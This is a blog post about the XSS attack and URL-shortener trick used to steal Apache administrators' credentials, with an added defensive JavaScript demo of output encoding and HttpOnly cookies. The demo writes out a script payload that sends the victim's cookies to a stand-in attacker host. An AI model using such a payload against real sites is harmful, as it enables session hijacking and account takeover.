How to be exposed via XSS - in one click - just doing your job...

Friday, April 16, 2010

Jason Remillard


Cross posted from:

As attacks on infrastructure become more sophisticated, the anatomy of a deep penetration is food for thought for every developer and operator.  Consider this case, in which the Apache Software Foundation's own infrastructure was significantly exposed by a simple XSS attack combined with a little social engineering (getting people to click on a link) to harvest the credentials of others.  After that, it was off to the races.

In this case, a redirect hosted on a URL-shortening site sent anyone who clicked it to a page carrying an XSS payload, which then captured the clicker's credentials (session cookies and the like). The clickers, in this case, were administrators of some of the Apache Foundation infrastructure.  From there the path took a meandering journey through key infrastructure, up to and including source code repositories and support systems.
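To make the mechanism concrete, here is an added example (not code from the original post, and not taken from Apache's incident report) that models the "siphon" step: a page that reflects an untrusted value straight into its HTML, the same page with output encoding, and the cookie flag that blunts the theft even when an injection succeeds. The page layout, the parameter, the attacker hostname and the cookie name are all assumptions for illustration; the HttpOnly flag goes slightly beyond what the post itself discusses.

```javascript
// Added example, not from the original post or from Apache's own code.
// The page, parameter name and attacker hostname are made up for illustration.

// Escape the five characters that let text break out of an HTML text node
// or attribute value. This is exactly what the vulnerable renderer lacks.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable: a search term taken from the URL is reflected into the page as-is.
function renderSearchVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Hardened: same page, but every untrusted value is encoded before insertion.
function renderSearchHardened(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// The kind of "siphon" payload an attacker hides behind a shortened link.
// If the browser executes it, the victim's cookies for this site are sent
// to a host the attacker controls (hostname is a constructed example).
const SIPHON_PAYLOAD =
  `<script>new Image().src='https://attacker.example/c?'+encodeURIComponent(document.cookie)</script>`;

// Crude indicator used below: did untrusted input end up as live markup?
function containsLiveScript(html) {
  return /<script[\s>]/i.test(html);
}

// Server-side companion: a session cookie flagged HttpOnly is not visible to
// document.cookie, so a successful injection still cannot siphon it.
// (Cookie name is an assumption; pick whatever your framework uses.)
function sessionCookieHeader(sessionId, { httpOnly = true, secure = true } = {}) {
  const parts = [`JSESSIONID=${sessionId}`, 'Path=/', 'SameSite=Lax'];
  if (secure) parts.push('Secure');
  if (httpOnly) parts.push('HttpOnly');
  return parts.join('; ');
}

// Run the payload through both renderers and report what a browser would see.
function demo() {
  const vulnerable = renderSearchVulnerable(SIPHON_PAYLOAD);
  const hardened = renderSearchHardened(SIPHON_PAYLOAD);
  return {
    vulnerableExecutes: containsLiveScript(vulnerable),      // true: script runs
    hardenedExecutes: containsLiveScript(hardened),          // false: inert text
    hardenedShowsTextOnly: hardened.includes('&lt;script&gt;'),
    cookie: sessionCookieHeader('abc123'),
  };
}

console.log(demo());
```

The point a practitioner should take from this: the link itself is harmless and the shortener is merely a disguise; the damage is done entirely by the target site reflecting input without encoding, and by session cookies that script can read. Fix the encoding, set HttpOnly on the session cookie, and the "click" buys the attacker nothing.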

Note as well that the initially captured credentials exposed other systems through cached credentials, cookies, and so on.  Much like pulling on a thread, the intruders just had to keep pulling and following.   Of course, these people knew what they were doing: turning off notifications for source code changes, choosing which servers to go after, knowing where to look, and so on.

Consider that they had several hours to roam the infrastructure before anyone noticed the breach.  I recall an exposure several years ago in which intruders had access for several months to key components of an SSH key infrastructure.  As far as has been documented, no major damage (modified file payloads and the like) was identified.  But this is a good example of why regular monitoring and scanning matter, especially in a distributed, multi-component architecture.

As a side note, kudos to the Apache team for full, quick and detailed documentation of their exposure.  We all learn from this, and we're all richer for it.

Fred Williams: Interesting thing with the shortened URLs used so much on Twitter and other sites: wouldn't it be a lot easier to trick users into going to malicious sites using shortened URLs?

Jason Remillard: Yes, that's basically what happened. Except this time it was the administrators who clicked on the shortened URL, which did an XSS redirect (basically the real website with a little extra bit of siphon code). Bingo, you now have their creds, and they don't even know it! All from an innocuous 'support ticket'...
